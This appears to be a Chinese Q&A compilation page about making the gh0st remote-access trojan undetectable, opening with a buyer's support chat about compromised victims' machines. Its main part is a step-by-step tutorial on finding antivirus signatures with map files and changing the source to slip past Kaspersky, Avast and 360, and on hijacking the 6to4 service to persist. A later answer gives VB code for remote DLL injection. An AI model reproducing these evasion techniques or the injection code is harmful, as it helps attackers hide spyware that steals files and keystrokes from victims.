gh0st源码免杀
Ⅰ ghost远控怎么做免杀
这个软件还是不错的,至少能值30块一个月
但人家卖三百就是谁钱多谁就拿 去喂他们这些狗吧
下面是我买了之后和客服的聊天记录,谁想买的参考下
0 14:53:35
上线了,360也没提示
但是用360杀毒快速扫描一下,就杀出来一个可疑启动项
然后禁止自启动,再重启下就不上线了
回复
饭客客服 14:54:43
金牌还是钻石
回复
0 14:55:59
钻石
回复
0 14:56:16
杀完再重启就不上线了
回复
饭客客服 14:56:47
知道了 会通知技术的
回复
0 14:58:10
谢谢了
买来还没能用过
回复
饭客客服 14:58:30
不过云你就不能用么
回复
饭客客服 14:58:39
那这么说我估计一个月你顶多能用10天
回复
0 14:59:43
不是,好不容易抓来鸡一杀没了
不是白忙活吗
回复
0 15:18:32
您这意思是钻石远控一个月有20天不过360云查杀?
回复
0 15:29:12
内网感染,无限复活什么的不能用就无所谓了
关键最基本的免杀不行的话真不好说了
我买的是一个月的免杀,不是10天的
您能给退款吗?
回复
0 16:13:59
能给个说法吗?
回复
0 16:15:22
才刚买2天,退200就行
回复
饭客客服 16:56:55
有谁会每天去云查杀啊,而且3天更新一次
回复
0 17:00:55
能退款不?
回复
饭客客服 17:02:57
没有理由不能退款
回复
0 17:03:25
谢谢
至少你没说任何情况都不能退
回复
饭客客服 17:05:14
只要理由充分,就可以退款
回复
0 17:07:51
我想买个免杀性好点的
所以才没去买金牌
其他官网上写的内网感染什么的都不说了
饭客客服 14:58:39
那这么说我估计一个月你顶多能用10天
这条就够了吧?退200就行,你也辛苦了
回复
饭客客服 17:08:20
你想买个,30天一直免杀的远控,除非去定制个人版
回复
0 17:08:58
那官网上怎么不写上一个月内保证10天免杀呢?
回复
0 18:34:47
?
回复
饭客客服 18:34:46
[自动回复]买包年钻石远控送铜牌VIP~~最新优惠
回复
0 21:55:26
?
回复
饭客客服 21:55:27
[自动回复]我去吃饭了,一会再联系。
Ⅱ 远控源码免杀需要什么工具
远控软件gh0st源码免杀
远控软件gh0st3.6开源了,开源意味着我们可以在此基础上进行二次开发,同时也意味着杀软可以较容易的查杀该款远控木马,既然要利用,我们就做好源码基础上的木马免杀工作。
好久没有来博客了,我把免杀这部分整理了一下,先抛一砖头,有兴趣的朋友可以接着做,也可以和本人交流。
序
gh0st远控软件采用驱动级RESSDT过主动,svchost参数启动,替换系统服务的方式工作的,工作方式较为先进,美中不足的部分是没有进行驱动级或用户级隐藏,当然这部分可以添加进去。编码利用了VC的编程环境。
一、环境配置
编译环境一定要配置好:DDK+SDK+VC6,DDK用来编译sys文件的,SDK+VC6是用来编译工程的,配置部分比较简单,网上有很多资料,这里不再详述,有兴趣的朋友也可以查看DDK和SDK的相关帮助。
二、特征码定位简述
杀毒软件查杀木马的原理基本是根据特征查杀的,被查杀的部分我们称之为特征码,所以我们可以利用特征码定位工具MyCLL定位出病毒的特征码位置,定位工具原理是将被扫描木马分块,利用分段填充的方式,匹配杀软的特征值,找到杀软查杀病毒的位置。
定位出特征码,如何反向找到源码中的对应位置呢?请看下面分析,
三、二进制文件与源码定位之map文件利用
map文件是二进制和源码之间对应的一个映射文件。
我们假设根据第三步我们定位出了病毒的特征码:
病毒名称 特征码位置 内存地址
svchost.dll 000038AA_00000002 100044AA
svchost.dll 00005F98_00000002
第一步设置VC编译环境生成Map文件。
在 VC 中,点击菜单“Project -> Settings”选项页(或按下 Alt+F7),选择 C/C++ 选项卡,并在最下面的 Project Options 里面输入:/Zd ,然后要点击 Link 选项卡,选中“Generate mapfile”复选框,并在最下面的 Project Options 里面输入:/mapinfo:lines,表示生成 MAP 文件时,加入行信息。设置完成。
第二步编译VC工程,设置活动工程编译即可,这个不用说明。这个步骤完成后,在release(或debug)目录,多了一个.map文件(比如svchost.map)。
第三步打开map文件(用UE或文本编辑器打开都行),形式如下:
(begin)
Timestamp is 488fcef2 (Wed Jul 30 10:16:18 2008)
Preferred load address is 10000000
---------------------------------------------------------------------------1----(为方便说明,wrw添加)
Start Length Name Class
0001:00000000 00010a50H .text CODE
0001:00010a50 00000485H .text$x CODE
0002:00000000 000004c8H .idata$5 DATA
......
0003:00000010 00000004H .CRT$XIZ DATA
0003:00000020 00001a50H .data DATA
0003:00001a70 00000688H .bss DATA
0004:00000000 000000a8H .rsrc$01 DATA
0004:000000b0 00000cf0H .rsrc$02 DATA
----------------------------------------------------------------------------2---(为方便说明,wrw添加)
Address Publics by Value Rva+Base Lib:Object
0001:00000000 ??0CAudio@@QAE@XZ 10001000 f Audio.obj
0001:000000d0 ??_GCAudio@@UAEPAXI@Z 100010d0 f i Audio.obj
0001:000000d0 ??_ECAudio@@UAEPAXI@Z 100010d0 f i Audio.obj
0001:000000f0 ??1CAudio@@UAE@XZ 100010f0 f Audio.obj
0001:000001e0 ?getRecordBuffer@CAudio@@QAEPAEPAK@Z 100011e0 f Audio.obj
0001:00000240 ?playBuffer@CAudio@@QAE_NPAEK@Z 10001240 f Audio.obj
0001:000002c0 ?InitializeWaveIn@CAudio@@AAE_NXZ 100012c0 f Audio.obj
......
0001:00003310 ?SendToken@CFileManager@@AAEHE@Z 10004310 f FileManager.obj
0001:00003320 ?UploadToRemote@CFileManager@@AAE_NPAE@Z 10004320 f FileManager.obj
0001:00003440 ?FixedUploadList@CFileManager@@AAE_NPBD@Z 10004440 f FileManager.obj
0001:00003670 ?StopTransfer@CFileManager@@AAEXXZ 10004670 f FileManager.obj
0001:00003730 ?CreateLocalRecvFile@CFileManager@@AAEXPAE@Z 10004730 f FileManager.obj
......
----------------------------------------------------------------------------3---(为方便说明,wrw添加)
Line numbers for ./Release/FileManager.obj(E:/vtmp/gh0st3src/Server/svchost/common/FileManager.cpp) segment .text
17 0001:00002630 20 0001:0000267f 21 0001:00002698 24 0001:000026d0
25 0001:000026f8 26 0001:0000273c 29 0001:000027d0 33 0001:000027ee
77 0001:000027f8 36 0001:000027fb 37 0001:00002803 77 0001:0000280d
......
532 0001:0000340f 534 0001:00003414 537 0001:00003428 540 0001:00003440
546 0001:0000345d 547 0001:00003487 548 0001:00003490 549 0001:00003492
551 0001:0000349e 552 0001:000034b8 553 0001:000034cb 554 0001:000034d4
558 0001:000034de 560 0001:000034e9 563 0001:000034ee 564 0001:00003506
......
(end)
我们看下,定位svchost.dll 的第一个特征码内存地址为:100044AA,在第2块中,我们可以找到RVA+BASE与之很接近的是
0001:00003440 ?FixedUploadList@CFileManager@@AAE_NPBD@Z 10004440 f FileManager.obj
这样我们可以定位到FileManager.cpp中的FixedUploadList函数,是不是范围缩小了?
下面我们再缩小代码行
利用这个公式:特征码行偏移 = 特征码地址(Crash Address)- 基地址(ImageBase Address)- 0x1000
看起来好像很难,其实很简单,我们将100044AA去掉内存基址10000000,再减1000,因为PE很多从1000开始,可以得到代码偏移地址为34AA。到第3块中找对应的代码行。
偏移地址34AA在(551 0001:0000349e 552 0001:000034b8 )中间,也就是551行和552行中间,我们到源程序中查找第551行:
wsprintf(lpszFilter, "%s%s*.*", lpPathName, lpszSlash);
这样就定位出源代码了,要怎么修改就怎么修改它就可以了。
四、实战免杀
A、卡巴免杀
首次编译后,先做卡巴的免杀。卡巴杀sys文件和dll,当然也就杀包装它们的install.exe,最后卡巴还杀生成的sever,我这里说杀生成好的server不是和前面的特征码重叠的地方,而是杀配置信息。
第一步、sys免杀
sys重新编译后,增加了输入表的函数,同时系统不同,造成很多地方不同于原特征,顺利通过卡巴、金山、小红伞等杀软。
第二步、svchost.dll免杀
特征码定位MultiByteToWideChar和"gh0st update"两个位置。这里是通过第3步map文件得出的。
卡巴怕加花指令, 这个函数MultiByteToWideChar的调用上,可以在这个函数前面随便加几句无效语句就可以通过卡巴杀软。
字符串调用"gh0st update" ,这个是用于更新用的 ,如果不要在线更新,直接把这个语句所在代码块删除;嘿嘿,其实搜索工程替换这个字符串为其他的字符串就可以了^_^,这个方法同时可以过金山杀软。
第三步、server免杀
卡巴定位在最后的配置信息,采取跳转显然是不行的,采用加花的办法,在写入AAAAAA配置信息之前,随便写些东西,就可以做server免杀。
卡巴免杀完成!
B、Avast免杀
最新的avast杀软再查杀1下,杀install.exe和svchost.dll(也就是杀生成的文件和其中的资源文件),接着做它的源码免杀。
定位在特征字符串%02d/%02d/%02d和“SYSTEM/CurrentControlSet/Services/%s”两个地方。
解决方案:
1、svchost.dll的特征码定位在键盘记录KeyboardManager.cpp文件中的SaveInfo(char *lpBuffer)函数。特征字符串%02d/%02d/%02d,也就是我们看到键盘记录的日期,修改之,修改的方法很多,将其改为[%d/%d/%d %d:%d:%d] ,编译即可通过avast杀软。
2、install的特征码定位在“SYSTEM/CurrentControlSet/Services/%s”,对应文件是install.cpp里的InstallService函数,修改大小写,编译即可通过免杀。
五、添加垃圾代码的小方法
垃圾代码要移动特征码所在的位置,不要跑到堆栈中了,这样的代码没有用。可以采取添加for循环,做计数,简单统计,采用局部变量,不改变后面的逻辑为宜。
添加输出表的方法:
有杀输出表的,可以在生成的svchost.dll上添加空函数 ,但是每次编译都要修改1次资源 ,其实我们在源码上添加如下语句:
extern "C" __declspec(dllexport) bool JustTempFun();//声明
……
extern "C" __declspec(dllexport) bool JustTempFun() //实现
{
return false;
}
编译后,输出表就被改变了,有的杀软就可做到代码免杀。
六、gh0st自动生成6to4ex.dll的修改
看到好多站友提问自动生成6to4ex.dll的问题,有热心站友也提出了自己的见解 ,我感觉有些人提出的解决方案不完全正确,有可能造成刚入手人误解,我根据自己的理解说明1下。
gh0st服务端是通svchost -netsvcs启动的,所以程序要利用netsvcs 服务,服务端也就是根据netsvcs生成的,故不能说服务端生成是随机的,相对于大多数系统来讲,基本是固定的,下面看分析。
查看install.cpp里面的InstallService()方法,首先遍历HKEY_LOCAL_MACHINE/SOFTWARE/ Microsoft/Windows NT/CurrentVersion/Svchost中的服务项,查找到一个服务后,程序采取替换服务的方法,将原服务删除,然后生成对应服务项+ ex.dll的文件替换原服务,6to4服务一般排在第一位,6to4服务是一种自动构造隧道的方式,作用在于只需要一个全球惟一的IPv4地址便可使得整个站点获得IPv6 的连接,这个服务对一般人来讲,基本闲置,所以我们的程序就把6to4服务给替换掉,同时在windows/system32/目录下生成 6to4ex.dll,以后启动就是6to4ex了,如果把这个服务跳过去,就依次向下生成Ias、Iprip等服务啦,如果netsvcs项没有可以替换的服务,则程序将自己添加1个服务,名称就是由 AddsvchostService()方法产生的netsvcs_0x%d。
这样说不知道关心服务名称的明白了不?
这个不能说是技术问题,但是小技巧问题可以从这里产生,我不知道其他人的360是怎么过的,但是我觉得可以提示1下的是,如果是360默认系统安全的服务,它肯定不会报不安全,替换闲置的系统安全的服务则通过360的效果要好的多
Ⅲ 易语言gh0st远控源码
ghost现在基本上都报毒,更新麻烦死了
Ⅳ 想做免杀远控,通过修改现有的公开源码好实现吗
你说的不错
现在免杀确实不好做了
源码免杀不错的,现在开源的远控也有,个人觉得开源的gh0st不错,你可以尝试下gh0st是C写的,看你的编程的底子了,我这还有编译免杀的教程,要的话M我。
还有鸽子1.2的开源,delphi写的,还有暗组的DRAT开源1.X的,还有其他的等等
要么你自己写一款也行,你要有技术的哦
Ⅳ gh0st源码免杀怎么过360安全卫士的提示
将上线信息的函数修改一下就行了。。
Ⅵ GHOST源码免杀特征码我定位在DLL上
就看你是过什么了,金山的GH0ST杀的很凶,不会汇编的源码去改简单,会汇编的直接扔到OD里面,动态调用,好了,不多说了
Ⅶ gh0st远控需要学C++还是VC++
gh0st远控是用c++语言在vc++编译器中编写的, �0�2所以要学c++,免杀 �0�2好像还要用汇编修改吧,
Ⅷ Gh0st3.6 源码中怎么实现进程注入的
我写过一个注入Dll的VB代码,两个参数,第一个是要注入的进程的PID,第二个是要注入的Dll的路径。代码如下(不加函数声明……)Public Function FxRemoteProcessInsertDll(ByVal pid As Long, ByVal DllPath As String) As Long
Dim lpThreadAttributes As SECURITY_ATTRIBUTES
Dim hProcess, hThread As Long
Dim DllBuffer As Long
Dim DllFileSize As Long
Dim rReturn As Long
Dim fAddr As Long
Dim errNum As Long
Dim errStr As String
hProcess = FxNormalOpenProcess(PROCESS_ALL_ACCESS, pid)
'所需权限PROCESS_QUERY_INFORMATION Or PROCESS_VM_OPERATION Or PROCESS_VM_READ Or PROCESS_VM_WRITE
If hProcess = 0 Then errStr = "打开进程失败!": GoTo errors DllFileSize = LenB(StrConv(DllPath, vbFromUnicode)) + 1
DllBuffer = VirtualAllocEx(hProcess, 0, DllFileSize, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
If DllBuffer = 0 Then errStr = "分配内存空间失败!": GoTo errors rReturn = WriteProcessLongMemory(hProcess, DllBuffer, ByVal DllPath, DllFileSize, 0)
If DllBuffer = 0 Then errStr = "写入内存失败!": GoTo errors
fAddr = GetProcAddress(GetMoleHandle("kernel32.dll"), "LoadLibraryA")
hThread = CreateRemoteThread(hProcess, lpThreadAttributes, 0, fAddr, DllBuffer, 0, ByVal 0&)
If DllBuffer = 0 Then errStr = "加载Dll失败!": GoTo errors
WaitForSingleObject hThread, INFINITE
'<——输出调试信息——
errNum = GetLastError
Debug.Print "DllFileSize:" & DllFileSize & ",DllBuffer:" & FormatHex(DllBuffer) & ",hThread:" & hThread & ",errNum:" & errNum
'——————————>
VirtualFreeEx hProcess, DllBuffer, DllFileSize, MEM_DECOMMIT
ZwClose hProcess
ZwClose hThread
FxRemoteProcessInsertDll = 1
Exit Function
errors:
MsgBox errStr, 0, "错误"
FxRemoteProcessInsertDll = 0
End Function
Ⅸ 求gh0st3.75远控的源码程序,是远控不是ghost 学习用 找不到啊 最新的就是3.75吧 有官方网站吗
3.75只有服务端代码,控制端的没有开源。
Ⅹ 真有GHOST免杀吗
ghost远控怎么做免杀 ...是Gh0st 不错的远控,有源码下载懂源码的话,可以源码免杀,很不错配置,就和普通远控一样啊 ...是Gh0st 不错的远控,有源码...